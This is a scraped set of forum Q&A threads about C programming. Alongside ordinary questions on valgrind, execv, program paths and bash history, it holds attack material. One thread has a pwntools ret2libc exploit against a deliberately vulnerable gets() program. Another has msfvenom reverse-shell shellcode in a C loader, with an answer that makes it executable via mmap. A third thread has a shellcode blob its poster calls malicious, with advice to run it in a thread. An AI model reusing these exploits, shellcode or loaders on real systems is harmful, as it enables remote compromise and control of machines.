I have a program which creates another process using a fork and almost immedietely calls execv on a executable. I want to check for memory leaks on the child process. Since the main process starts a lot of other executables and runs many more scripts (which are too difficult to keep track of for using --trace-children option), I want to invoke valgrind from inside of the main process using execv and pass the executable as an argument.
My code goes something like this -
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main()
{
char tool[30], logpath[30], executable[30], exepath[30];
char *arguments[5];
strcpy(tool, "--leak-check=full");
strcpy(logpath, "--log-file=valrep.txt");
strcpy(executable, "./memleak");
strcpy(exepath, "/usr/bin/valgrind");
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = exepath;
execv("/usr/bin/valgrind", arguments);
return 0;
}
Where memleak is the program which I want to check for leaks. But when i run this program, I am getting this error.
Running valgrind using the tool: --leak-check=full.
The report is stored in: --log-file=valrep.txt.
valgrind: You cannot run '/usr/bin/valgrind' directly.
valgrind: You should use $prefix/bin/valgrind.
I did some googling but couldn't find out the reason. Please help!
You are not passing your executable path.
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = exepath;
Replace as
arguments[0] = exepath;
arguments[1] = tool;
arguments[2] = logpath;
arguments[3] = executable;
Let me know, if you face any issue with this..
Related
I was following a tutorial regarding bufferoverflow(ret2libc) attack and it failed due to unknown reasons. The C program I wrote is as follows:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
char buf[256];
gets(buf);
return 0;
}
and i compiled it so it so it has checksec as:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
and the exploit i have written is:
from pwn import *
proc = process("./vuln")
junk = "A"*264
libc_base = 0x00007ffff7dee000
system_offset = 0x0000000000048df0
exec_offset = 0x00000000000cb7c0
exit_offset = 0x000000000003e600
binsh_offset = 0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))
buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
But immediately after running the exploit it is giving me an error:
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
Can someone please tell me what is the problem here, Thanks in advance.
Using base64.b64encode here is bad because it will encode the addresses and hide them from the machine that executes the code.
I didn't check well and there may be other errors, but the first thing to do is removing them and pass the machine the addresses of the parts.
I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.
So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.
Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/
and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable
So what I did :
#include <stdio.h>
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";
int main(int argc, char **argv) {
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
}
Compiled it, launched it.. And crash....
Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 :
Violation d'accès lors de l'exécution à l'emplacement 0x00338000.
The crash is happening here : (int)(*func) ();
As I don't really understand what's the program is trying to do (I'm quite new to C), I don't know from where is the problem.. Is it my shellcode or is it the way it is called ?
And does someone has some documentation about executing shellcode in C/C++ ?
Thanks all for your help.
You are getting segmentation fault because the memory is not marked as executable.
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
void *buf;
/* copy code to executable buffer */
buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (buf, code, sizeof(code));
/* run code */
int i = ((int (*) (void))buf)();
printf("Return value [%d]\n", i);
The bytes represent machine instructions. On ordinary machines, the memory is broken in different memory segments, and code will typically goes in a data segment. The call:
int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();
tries to execute the code contained in these bytes.
However, modern operating systems provide usually by default a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.
I'm using GTK to create an interface for my C program running Linux.
I'm using this function to load my XML interface:
gtk_builder_add_from_file(builder, g_build_filename("myInterface.glade", NULL), &error);
As long as I'm in the same directory as my compiled file, it works.
But if I'm in another directory, let say a child one and I execute it: ../a.out, my program doesn't find the file.
So the idea is to first get the program path ("/home/.../program") and to add the file name to get an absolute path.
But I have no idea how can I get the program path. And I'm not sure this is the best idea to make it work.
Any idea? Thanks!
argv[0] contain the relative/full path you ran to run the program.
just scan up to the last '/' and this will be the run dir from your current location
'edit' after some more research, i found this, which works in all cases:
#include<stdio.h>
#include <unistd.h>
#include <string.h>
#include <libgen.h>
int main()
{
char path[500] = {0};
int dest_len = 500;
if (readlink ("/proc/self/exe", path, dest_len) != -1)
{
dirname (path);
strcat (path, "/");
printf("path=%s\n", path);
}
}
In your case where you are using GTK, it is better to use GResource and compile myInterface.glade directly into your program.
My code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
printf("entering main process---\n");
int ret;
char *argv[] = {"history",NULL};
ret = execvp("history",argv);
if(ret == -1)
perror("execl error");
printf("exiting main process ----\n");
return 0;
}
Output:
entering main process---
execl error: No such file or directory
exiting main process ----
Question:
Can I get executed commands not using history or ~/.bash_history?
It seems that something is wrong using function like execvp .
I've tried system function.
Code:
#include <stdio.h>
int main()
{
system("history");
return 0 ;
}
Nothing output.
If you try a man history you will get into the BASH_BUILTINS(1) General Commands Manual page. This means history is part of the bash shell internals. In order to have something executed via execvp() you need to have an actual executable somewhere in your PATH.
It's unclear why reading ~/.bash_history is not enough. Is it perhaps because you want the history of the currently running shell?
The short answer is no, you can't get it.
The long answer is you could attach with ptrace or through /proc/pid/mem, find the history in memory, and print it.
Probably not worth the effort.
You can pipe the output of the history builtin if you wish, by running your program with
history | ./myprog
#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this");
return 0;
}
While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().
Please help :)
Reply to Eric Finn and Alvin Wong
I changed as what both of you instructed and the error I got is:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
X:>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this
char shellcode[] is valid. I have compiled it successfully before.
below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";
int main (int argc, char **argv) {
void (*sptr)();
sptr = (void(*)()) (&shellcode);
sptr();
printf("must display this"); // instead of more lines i put this one
return 0;
}
the above code compiles successfully and runs perfectly
i changed some lines to system(shellcode). it compiles but doesnt run properly
Okay, since shellcode is actually machine code rather than shell code (according to your latest edit), the answer is different.
When you declare char shellcode[], shellcode is a pointer to a memory location. This means that instead of
sptr = (void(*)()) (&shellcode);
you should have
sptr = (void(*)()) (shellcode);
Additionally, you want the code to be in the executable part of your binary, rather than in the data part of the binary. That means you want char *shellcode = ... rather than char shellcode[] = ....
Also, you should be sure that shellcode is a valid compiled C function with the same calling convention as the code that calls it.
As my understanding, you want to run some "machine code" (not shellcode), and no matter how the code runs it should continue the program.
This is possible, by using threading.
First add these includes:
#include <windows.h>
#include <process.h>
And in your code:
void (*sptr)(void*); // Type for `_beginthread`
sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
_beginthread(sptr,0,NULL); // This starts your code in a new thread
Sleep(5000); // Wait for 5000 ms
printf("must display this");
Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.
P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...